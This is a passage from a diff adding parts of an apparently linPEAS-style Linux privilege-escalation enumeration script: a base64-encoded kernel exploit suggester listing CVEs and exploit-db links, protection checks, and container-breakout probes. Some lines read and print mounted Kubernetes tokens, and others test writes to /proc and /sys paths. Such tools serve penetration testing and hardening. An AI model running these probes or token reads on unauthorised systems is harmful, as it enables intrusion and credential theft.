            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
            '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
            '2.6.36',
        ],
        alt => 'econet',
        cve => '2010-4073',
        mil => 'http://www.exploit-db.com/exploits/17787',
    },
    'caps_to_root' => {
        vuln => [ '2.6.34', '2.6.35', '2.6.36' ],
        cve  => 'n/a',
        mil => 'http://www.exploit-db.com/exploits/15916',
    },
    'american-sign-language' => {
        vuln => [
            '2.6.0',  '2.6.1',  '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',
            '2.6.6',  '2.6.7',  '2.6.8',  '2.6.9',  '2.6.10', '2.6.11',
            '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
            '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
            '2.6.36',
        ],
        cve => '2010-4347',
        mil => 'http://www.securityfocus.com/bid/45408',
    },
    'pktcdvd' => {
        vuln => [
            '2.6.0',  '2.6.1',  '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',
            '2.6.6',  '2.6.7',  '2.6.8',  '2.6.9',  '2.6.10', '2.6.11',
            '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
            '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
            '2.6.36',
        ],
        cve => '2010-3437',
        mil => 'http://www.exploit-db.com/exploits/15150',
    },
    'video4linux' => {
        vuln => [
            '2.6.0',  '2.6.1',  '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',
            '2.6.6',  '2.6.7',  '2.6.8',  '2.6.9',  '2.6.10', '2.6.11',
            '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
            '2.6.30', '2.6.31', '2.6.32', '2.6.33',
        ],
        cve => '2010-3081',
        mil => 'http://www.exploit-db.com/exploits/15024',
    },
    'memodipper' => {
        vuln => [
            '2.6.39', '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4',
            '3.0.5',  '3.0.6', '3.1.0',
        ],
        cve => '2012-0056',
        mil => 'http://www.exploit-db.com/exploits/18411',
    },
    'semtex' => {
        vuln => [
            '2.6.37', '2.6.38', '2.6.39', '3.0.0', '3.0.1', '3.0.2',
            '3.0.3',  '3.0.4',  '3.0.5',  '3.0.6', '3.1.0',
        ],
        cve => '2013-2094',
        mil => 'http://www.exploit-db.com/exploits/25444',
    },
    'perf_swevent' => {
        vuln => [
            '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4', '3.0.5',
            '3.0.6', '3.1.0', '3.2.0', '3.3.0', '3.4.0', '3.4.1',
            '3.4.2', '3.4.3', '3.4.4', '3.4.5', '3.4.6', '3.4.8',
            '3.4.9', '3.5.0', '3.6.0', '3.7.0', '3.8.0', '3.8.1',
            '3.8.2', '3.8.3', '3.8.4', '3.8.5', '3.8.6', '3.8.7',
            '3.8.8', '3.8.9',
        ],
        cve => '2013-2094',
        mil => 'http://www.exploit-db.com/exploits/26131',
    },
    'msr' => {
        vuln => [
            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.27', '2.6.28',
            '2.6.29', '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34',
            '2.6.35', '2.6.36', '2.6.37', '2.6.38', '2.6.39', '3.0.0',
            '3.0.1',  '3.0.2',  '3.0.3',  '3.0.4',  '3.0.5',  '3.0.6',
            '3.1.0',  '3.2.0',  '3.3.0',  '3.4.0',  '3.5.0',  '3.6.0',
            '3.7.0',  '3.7.6',
        ],
        cve => '2013-0268',
        mil => 'http://www.exploit-db.com/exploits/27297',
    },
    'timeoutpwn' => {
        vuln => [
            '3.4.0',  '3.5.0',  '3.6.0',  '3.7.0',  '3.8.0',  '3.8.9', 
            '3.9.0',  '3.10.0', '3.11.0', '3.12.0', '3.13.0', '3.4.0',
            '3.5.0',  '3.6.0',  '3.7.0',  '3.8.0',  '3.8.5',  '3.8.6',  
            '3.8.9',  '3.9.0',  '3.9.6',  '3.10.0', '3.10.6', '3.11.0',
            '3.12.0', '3.13.0', '3.13.1'
        ],
        cve => '2014-0038',
        mil => 'http://www.exploit-db.com/exploits/31346',
    },
    'rawmodePTY' => {
        vuln => [
            '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', '2.6.36',
            '2.6.37', '2.6.38', '2.6.39', '3.14.0', '3.15.0'
        ],
        cve => '2014-0196',
        mil => 'http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c',
    },
    'overlayfs' => {
        vuln => [
            '3.13.0', '3.16.0', '3.19.0'
        ],
        cve => '2015-8660',
        mil => 'http://www.exploit-db.com/exploits/39230',
    },
    'pp_key' => {
        vuln => [
			'3.4.0',  '3.5.0',  '3.6.0',  '3.7.0',  '3.8.0',  '3.8.1',  
            '3.8.2',  '3.8.3',  '3.8.4',  '3.8.5',  '3.8.6',  '3.8.7',  
            '3.8.8',  '3.8.9',  '3.9.0',  '3.9.6',  '3.10.0', '3.10.6', 
            '3.11.0', '3.12.0', '3.13.0', '3.13.1'
        ],
        cve => '2016-0728',
        mil => 'http://www.exploit-db.com/exploits/39277',
    },
    'dirty_cow' => {
        vuln => [
            '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', 
			'2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', '2.6.32', 
            '2.6.33', '2.6.34', '2.6.35', '2.6.36', '2.6.37', '2.6.38', 
            '2.6.39', '3.0.0',  '3.0.1',  '3.0.2',  '3.0.3',  '3.0.4',  
            '3.0.5',  '3.0.6',  '3.1.0',  '3.2.0',  '3.3.0',  '3.4.0',  
            '3.5.0',  '3.6.0',  '3.7.0',  '3.7.6',  '3.8.0',  '3.9.0'
        ],
        cve => '2016-5195',
        mil => 'http://www.exploit-db.com/exploits/40616',
    },
    'af_packet' => {
        vuln => ['4.4.0' ],
        cve => '2016-8655',
        mil => 'http://www.exploit-db.com/exploits/40871',
    },
    'packet_set_ring' => {
        vuln => ['4.8.0' ],
        cve => '2017-7308',
        mil => 'http://www.exploit-db.com/exploits/41994',
    },
    'clone_newuser' => {
        vuln => [
            '3.3.5', '3.3.4', '3.3.2', '3.2.13', '3.2.9', '3.2.1', 
            '3.1.8', '3.0.5', '3.0.4', '3.0.2', '3.0.1', '3.2', '3.0.1', '3.0'
        ],
        cve => 'N\A',
        mil => 'http://www.exploit-db.com/exploits/38390',
    },
    'get_rekt' => {
        vuln => [
            '4.4.0', '4.8.0', '4.10.0', '4.13.0'
        ],
        cve => '2017-16695',
        mil => 'http://www.exploit-db.com/exploits/45010',
    },
    'exploit_x' => {
        vuln => [
            '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27',
            '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', '2.6.32',
            '2.6.33', '2.6.34', '2.6.35', '2.6.36', '2.6.37', '2.6.38',
            '2.6.39', '3.0.0',  '3.0.1',  '3.0.2',  '3.0.3',  '3.0.4',
            '3.0.5',  '3.0.6',  '3.1.0',  '3.2.0',  '3.3.0',  '3.4.0',
            '3.5.0',  '3.6.0',  '3.7.0',  '3.7.6',  '3.8.0',  '3.9.0',
            '3.10.0', '3.11.0', '3.12.0', '3.13.0', '3.14.0', '3.15.0',
            '3.16.0', '3.17.0', '3.18.0', '3.19.0', '4.0.0',  '4.1.0',
            '4.2.0',  '4.3.0',  '4.4.0',  '4.5.0',  '4.6.0',  '4.7.0'
        ],
        cve => '2018-14665',
        mil => 'http://www.exploit-db.com/exploits/45697',
    },
  );
}

__END__
=head1 NAME

linux_exploit_suggester-2.pl - A local exploit suggester for linux

=head1 DESCRIPTION

This perl script will enumerate the possible exploits available for a given kernel version

=head1 USAGE

[-h] Help (this message)
[-k] Kernel number (eg. 2.6.28)
[-d] Open exploit download menu

You can also provide a partial kernel version (eg. 2.4)
to see all exploits available.

=head1 AUTHOR

Jonathan Donas (c) 2019

=cut

=head1 LICENSE

 Linux Exploit Suggester 2

 This program is free software; you can redistribute it and/or modify
 it under the terms of the GNU General Public License as published by
 the Free Software Foundation; either version 2 of the License, or
 (at your option) any later version.

 This program is distributed in the hope that it will be useful,
 but WITHOUT ANY WARRANTY; without even the implied warranty of
 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 GNU General Public License for more details.
        
 You should have received a copy of the GNU General Public License along
 with this program; if not, write to the Free Software Foundation, Inc.,
 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

=cut
"
+ echo $les2_b64 | base64 -d | perl | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -i "CVE" -B 1 -A 10 | grep -Ev "^\-\-$" | sed -${E} "s,CVE-[0-9]+-[0-9]+,${SED_RED},g"
+ echo ""
+fi
+
+if [ "$MACPEAS" ] && [ "$(command -v brew 2>/dev/null)" ]; then
+ print_2title "Brew Doctor Suggestions"
+ brew doctor
+ echo ""
+fi
+
+
+
+#-- SY) AppArmor
+print_2title "Protections"
+print_list "AppArmor enabled? .............. "$NC
+if [ "$(command -v aa-status 2>/dev/null)" ]; then
+ aa-status 2>&1 | sed "s,disabled,${SED_RED},"
+elif [ "$(command -v apparmor_status 2>/dev/null)" ]; then
+ apparmor_status 2>&1 | sed "s,disabled,${SED_RED},"
+elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then
+ ls -d /etc/apparmor*
+else
+ echo_not_found "AppArmor"
+fi
+
+#-- SY) grsecurity
+print_list "grsecurity present? ............ "$NC
+( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity")
+
+#-- SY) PaX
+print_list "PaX bins present? .............. "$NC
+(command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX")
+
+#-- SY) Execshield
+print_list "Execshield enabled? ............ "$NC
+(grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED},"
+
+#-- SY) SElinux
+print_list "SELinux enabled? ............... "$NC
+(sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED},"
+
+#-- SY) Seccomp
+print_list "Seccomp enabled? ............... "$NC
+([ "$(grep Seccomp /proc/self/status | grep -v 0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"
+
+#-- SY) AppArmor
+print_list "AppArmor profile? .............. "$NC
+(cat /proc/self/attr/current 2>/dev/null || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,kernel,${SED_GREEN},"
+
+#-- SY) AppArmor
+print_list "User namespace? ................ "$NC
+if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then echo "enabled" | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi
+
+#-- SY) cgroup2
+print_list "Cgroup2 enabled? ............... "$NC
+([ "$(grep cgroup2 /proc/filesystems)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"
+
+#-- SY) Gatekeeper
+if [ "$MACPEAS" ]; then
+ print_list "Gatekeeper enabled? .......... "$NC
+ (spctl --status 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED},"
+
+ print_list "sleepimage encrypted? ........ "$NC
+ (sysctl vm.swapusage | grep "encrypted" | sed "s,encrypted,${SED_GREEN},") || echo_no
+
+ print_list "XProtect? .................... "$NC
+ (system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5 | grep -Iv "^$") || echo_no
+
+ print_list "SIP enabled? ................. "$NC
+ csrutil status | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no
+
+ print_list "Connected to JAMF? ........... "$NC
+ warn_exec jamf checkJSSConnection
+
+ print_list "Connected to AD? ............. "$NC
+ dsconfigad -show && echo "" || echo_no
+fi
+
+#-- SY) ASLR
+print_list "Is ASLR enabled? ............... "$NC
+ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null)
+if [ -z "$ASLR" ]; then
+ echo_not_found "/proc/sys/kernel/randomize_va_space";
+else
+ if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi
+ echo ""
+fi
+
+#-- SY) Printer
+print_list "Printer? ....................... "$NC
+(lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null
+
+#-- SY) Running in a virtual environment
+print_list "Is this a virtual machine? ..... "$NC
+hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor)
+if [ "$(command -v systemd-detect-virt 2>/dev/null)" ]; then
+ detectedvirt=$(systemd-detect-virt)
+ if [ "$hypervisorflag" ]; then printf $RED"Yes ($detectedvirt)"$NC; else printf $GREEN"No"$NC; fi
+else
+ if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi
+fi
+
+fi
+echo ''
+echo ''
+if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
+
+if echo $CHECKS | grep -q container; then
+print_title "Container"
+###########################################
+#---------) Container functions (---------#
+###########################################
+
+containerCheck() {
+ inContainer=""
+ containerType="$(echo_no)"
+
+ # Are we inside docker?
+ if [ -f "/.dockerenv" ] ||
+ grep "/docker/" /proc/1/cgroup -qa 2>/dev/null ||
+ grep -qai docker /proc/self/cgroup 2>/dev/null ||
+ [ "$(find / -maxdepth 3 -name '*dockerenv*' -exec ls -la {} \; 2>/dev/null)" ] ; then
+
+ inContainer="1"
+ containerType="docker\n"
+ fi
+
+ # Are we inside kubenetes?
+ if grep "/kubepod" /proc/1/cgroup -qa 2>/dev/null ||
+ grep -qai kubepods /proc/self/cgroup 2>/dev/null; then
+
+ inContainer="1"
+ if [ "$containerType" ]; then containerType="$containerType (kubernetes)\n"
+ else containerType="kubernetes\n"
+ fi
+ fi
+
+ # Inside concourse?
+ if grep "/concourse" /proc/1/mounts -qa 2>/dev/null; then
+ inContainer="1"
+ if [ "$containerType" ]; then
+ containerType="$containerType (concourse)\n"
+ fi
+ fi
+
+ # Are we inside LXC?
+ if env | grep "container=lxc" -qa 2>/dev/null ||
+ grep "/lxc/" /proc/1/cgroup -qa 2>/dev/null; then
+
+ inContainer="1"
+ containerType="lxc\n"
+ fi
+
+ # Are we inside podman?
+ if env | grep -qa "container=podman" 2>/dev/null ||
+ grep -qa "container=podman" /proc/1/environ 2>/dev/null; then
+
+ inContainer="1"
+ containerType="podman\n"
+ fi
+
+ # Check for other container platforms that report themselves in PID 1 env
+ if [ -z "$inContainer" ]; then
+ if grep -a 'container=' /proc/1/environ 2>/dev/null; then
+ inContainer="1"
+ containerType="$(grep -a 'container=' /proc/1/environ | cut -d= -f2)\n"
+ fi
+ fi
+}
+
+inDockerGroup() {
+ DOCKER_GROUP="No"
+ if groups 2>/dev/null | grep -q '\bdocker\b'; then
+ DOCKER_GROUP="Yes"
+ fi
+}
+
+checkDockerRootless() {
+ DOCKER_ROOTLESS="No"
+ if docker info 2>/dev/null|grep -q rootless; then
+ DOCKER_ROOTLESS="Yes ($TIP_DOCKER_ROOTLESS)"
+ fi
+}
+
+enumerateDockerSockets() {
+ dockerVersion="$(echo_not_found)"
+ if ! [ "$SEARCHED_DOCKER_SOCKETS" ]; then
+ SEARCHED_DOCKER_SOCKETS="1"
+ for int_sock in $(find / ! -path "/sys/*" -type s -name "docker.sock" -o -name "docker.socket" -o -name "dockershim.sock" -n -name "containerd.sock" -o -name "crio.sock" -o -name "frakti.sock" -o -name "rktlet.sock" 2>/dev/null); do
+ if ! [ "$IAMROOT" ] && [ -w "$int_sock" ]; then
+ if echo "$int_sock" | grep -Eq "docker"; then
+ dock_sock="$int_sock"
+ echo "You have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${SED_RED_YELLOW},g"
+ echo "Docker enummeration:"
+ docker_enumerated=""
+
+ if [ "$(command -v curl)" ]; then
+ sockInfoResponse="$(curl -s --unix-socket $dock_sock http://localhost/info)"
+ dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'ServerVersion' | cut -d'"' -f 4)
+ echo $sockInfoResponse | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"'
+ if [ "$sockInfoResponse" ]; then docker_enumerated="1"; fi
+ fi
+
+ if [ "$(command -v docker)" ] && ! [ "$docker_enumerated" ]; then
+ sockInfoResponse="$(docker info)"
+ dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'Server Version' | cut -d' ' -f 4)
+ printf "$sockInfoResponse" | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"'
+ fi
+
+ else
+ echo "You have write permissions over interesting socket $int_sock" | sed -${E} "s,$int_sock,${SED_RED},g"
+ fi
+
+ else
+ echo "You don't have write permissions over interesting socket $int_sock" | sed -${E} "s,$int_sock,${SED_GREEN},g"
+ fi
+ done
+ fi
+}
+
+checkDockerVersionExploits() {
+ if echo "$dockerVersion" | grep -iq "not found"; then
+ VULN_CVE_2019_13139="$(echo_not_found)"
+ VULN_CVE_2019_5736="$(echo_not_found)"
+ return
+ fi
+
+ VULN_CVE_2019_13139="$(echo_no)"
+ if [ "$(echo $dockerVersion | sed 's,\.,,g')" -lt "1895" ]; then
+ VULN_CVE_2019_13139="Yes"
+ fi
+
+ VULN_CVE_2019_5736="$(echo_no)"
+ if [ "$(echo $dockerVersion | sed 's,\.,,g')" -lt "1893" ]; then
+ VULN_CVE_2019_5736="Yes"
+ fi
+}
+
+checkContainerExploits() {
+ VULN_CVE_2019_5021="$(echo_no)"
+ if [ -f "/etc/alpine-release" ]; then
+ alpineVersion=$(cat /etc/alpine-release)
+ if [ "$(echo $alpineVersion | sed 's,\.,,g')" -ge "330" ] && [ "$(echo $alpineVersion | sed 's,\.,,g')" -le "360" ]; then
+ VULN_CVE_2019_5021="Yes"
+ fi
+ fi
+}
+
+checkProcSysBreakouts(){
+ if [ "$(ls -l /sys/fs/cgroup/*/release_agent 2>/dev/null)" ]; then release_agent_breakout1="Yes"; else release_agent_breakout1="No"; fi
+
+ mkdir /tmp/cgroup_3628d4
+ mount -t cgroup -o memory cgroup /tmp/cgroup_3628d4 2>/dev/null
+ if [ $? -eq 0 ]; then release_agent_breakout12="Yes"; else release_agent_breakout2="No"; fi
+ rm -rf /tmp/cgroup_3628d4 2>/dev/null
+
+ core_pattern_breakout="$( (echo -n '' > /proc/sys/kernel/core_pattern && echo Yes) 2>/dev/null || echo No)"
+ modprobe_present="$(ls -l `cat /proc/sys/kernel/modprobe` || echo No)"
+ panic_on_oom_dos="$( (echo -n '' > /proc/sys/vm/panic_on_oom && echo Yes) 2>/dev/null || echo No)"
+ panic_sys_fs_dos="$( (echo -n '' > /proc/sys/fs/suid_dumpable && echo Yes) 2>/dev/null || echo No)"
+ binfmt_misc_breakout="$( (echo -n '' > /proc/sys/fs/binfmt_misc/register && echo Yes) 2>/dev/null || echo No)"
+ proc_configgz_readable="$([ -r '/proc/config.gz' ] 2>/dev/null && echo Yes || echo No)"
+ sysreq_trigger_dos="$( (echo -n '' > /proc/sysrq-trigger && echo Yes) 2>/dev/null || echo No)"
+ kmsg_readable="$( (dmesg > /dev/null 2>&1 && echo Yes) 2>/dev/null || echo No)" # Kernel Exploit Dev
+ kallsyms_readable="$( (head -n 1 /proc/kallsyms > /dev/null && echo Yes )2>/dev/null || echo No)" # Kernel Exploit Dev
+ mem_readable="$( (head -n 1 /proc/self/mem > /dev/null && echo Yes) 2>/dev/null || echo No)"
+ if [ "$(head -n 1 /tmp/kcore 2>/dev/null)" ]; then kcore_readable="Yes"; else kcore_readable="No"; fi
+ kmem_readable="$( (head -n 1 /proc/kmem > /dev/null && echo Yes) 2>/dev/null || echo No)"
+ kmem_writable="$( (echo -n '' > /proc/kmem > /dev/null && echo Yes) 2>/dev/null || echo No)"
+ mem_readable="$( (head -n 1 /proc/mem > /dev/null && echo Yes) 2>/dev/null || echo No)"
+ mem_writable="$( (echo -n '' > /proc/mem > /dev/null && echo Yes) 2>/dev/null || echo No)"
+ sched_debug_readable="$( (head -n 1 /proc/sched_debug > /dev/null && echo Yes) 2>/dev/null || echo No)"
+ mountinfo_readable="$( (head -n 1 /proc/*/mountinfo > /dev/null && echo Yes) 2>/dev/null || echo No)"
+ uevent_helper_breakout="$( (echo -n '' > /sys/kernel/uevent_helper && echo Yes) 2>/dev/null || echo No)"
+ vmcoreinfo_readable="$( (head -n 1 /sys/kernel/vmcoreinfo > /dev/null && echo Yes) 2>/dev/null || echo No)"
+ security_present="$( (ls -l /sys/kernel/security > /dev/null && echo Yes) 2>/dev/null || echo No)"
+ security_writable="$( (echo -n '' > /sys/kernel/security/a && echo Yes) 2>/dev/null || echo No)"
+ efi_vars_writable="$( (echo -n '' > /sys/firmware/efi/vars && echo Yes) 2>/dev/null || echo No)"
+ efi_efivars_writable="$( (echo -n '' > /sys/firmware/efi/efivars && echo Yes) 2>/dev/null || echo No)"
+}
+
+
+##############################################
+#---------------) Containers (---------------#
+##############################################
+containerCheck
+
+print_2title "Container related tools present"
+command -v docker
+command -v lxc
+command -v rkt
+command -v kubectl
+command -v podman
+command -v runc
+
+print_2title "Am I Containered?"
+execBin "AmIContainered" "https://github.com/genuinetools/amicontained" "$FAT_LINPEAS_AMICONTAINED"
+
+print_2title "Container details"
+print_list "Is this a container? ...........$NC $containerType"
+
+print_list "Any running containers? ........ "$NC
+# Get counts of running containers for each platform
+dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l)
+podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l)
+lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l)
+rktcontainers=$(rkt list 2>/dev/null | tail -n +2 | wc -l)
+if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then
+ echo_no
+else
+ containerCounts=""
+ if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi
+ if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi
+ if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi
+ if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi
+ echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED},"
+
+ # List any running containers
+ if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi
+ if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi
+ if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi
+ if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi
+fi
+
+#If docker
+if echo "$containerType" | grep -qi "docker"; then
+ print_2title "Docker Container details"
+ inDockerGroup
+ print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+ print_list "Looking and enumerating Docker Sockets\n"$NC
+ enumerateDockerSockets
+ print_list "Docker version .................$NC$dockerVersion"
+ checkDockerVersionExploits
+ print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+ print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+ if [ "$inContainer" ]; then
+ checkDockerRootless
+ print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN},"
+ echo ""
+ fi
+ if df -h | grep docker; then
+ print_2title "Docker Overlays"
+ df -h | grep docker
+ fi
+fi
+
+#If token secrets mounted
+if [ "$(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p')" ]; then
+ print_2title "Listing mounted tokens"
+ print_info "https://book.hacktricks.xyz/cloud-security/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod"
+ ALREADY="IinItialVaaluE"
+ for i in $(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'); do
+ TOKEN=$(cat $(echo $i | sed 's/.namespace$/\/token/'))
+ if ! [ $(echo $TOKEN | grep -E $ALREADY) ]; then
+ ALREADY="$ALREADY|$TOKEN"
+ echo "Directory: $i"
+ echo "Namespace: $(cat $i)"
+ echo ""
+ echo $TOKEN
+ echo "================================================================================"
+ echo ""
+ fi
+ done
+fi
+
+if [ "$inContainer" ]; then
+ echo ""
+ print_2title "Container & breakout enumeration"
+ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout"
+ print_list "Container ID ...................$NC $(cat /etc/hostname && echo '')"
+ if echo "$containerType" | grep -qi "docker"; then
+ print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n"
+ fi
+ print_list "Seccomp enabled? ............... "$NC
+ ([ "$(grep Seccomp /proc/self/status | grep -v 0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"
+
+ print_list "AppArmor profile? .............. "$NC
+ (cat /proc/self/attr/current 2>/dev/null || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,kernel,${SED_GREEN},"
+
+ print_list "User proc namespace? ........... "$NC
+ if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then echo "enabled" | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi
+
+ checkContainerExploits
+ print_list "Vulnerable to CVE-2019-5021 .... $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+
+ print_3title "Breakout via mounts"
+ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/sensitive-mounts"
+
+ checkProcSysBreakouts
+ print_list "release_agent breakout 1........ $release_agent_breakout1\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+ print_list "release_agent breakout 2........ $release_agent_breakout2\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+ print_list "core_pattern breakout .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+ print_list "binfmt_misc breakout ........... $binfmt_misc_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+ print_list "uevent_helper breakout ......... $uevent_helper_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+ print_list "core_pattern breakout .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
+ print_list "is modprobe present ............ $modprobe_present\n" | sed -${E} "s,/.*,${SED_RED},"
+ print_list "DoS via panic_on_oom ........... $panic_on_oom_dos\n"
+ print_list "DoS via panic_sys_fs ........... $panic_sys_fs_dos\n"
+ print_list "DoS via sysreq_trigger_dos ..... $sysreq_trigger_dos\n"
+ print_list "/proc/config.gz readable ....... $proc_configgz_readable\n"
+ print_list "/proc/sched_debug readable ..... $sched_debug_readable\n"
+ print_list "/proc/*/mountinfo readable ..... $mountinfo_readable\n"
+ print_list "/sys/kernel/security present ... $security_present\n"
+ print_list "/sys/kernel/security writable .. $security_writable\n"
+ if [ "$EXTRA_CHECKS" ]; then
+ print_list "/proc/kmsg readable ............ $kmsg_readable\n"
+ print_list "/proc/kallsyms readable ........ $kallsyms_readable\n"
+ print_list "/proc/self/mem readable ........ $sched_debug_readable\n"
+ print_list "/proc/kcore readable ........... $kcore_readable\n"
+ print_list "/proc/kmem readable ............ $kmem_readable\n"
+ print_list "/proc/kmem writable ............ $kmem_writable\n"
+ print_list "/proc/mem readable ............. $mem_readable\n"
+ print_list "/proc/mem writable ............. $mem_writable\n"
+ print_list "/sys/kernel/vmcoreinfo readable $vmcoreinfo_readable\n"
+ print_list "/sys/firmware/efi/vars writable $efi_vars_writable\n"
+ print_list "/sys/firmware/efi/efivars writable $efi_efivars_writable\n"
+ fi
+
+ echo ""
+ print_3title "Namespaces"
+ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/namespaces"
+ ls -l /proc/self/ns/
+
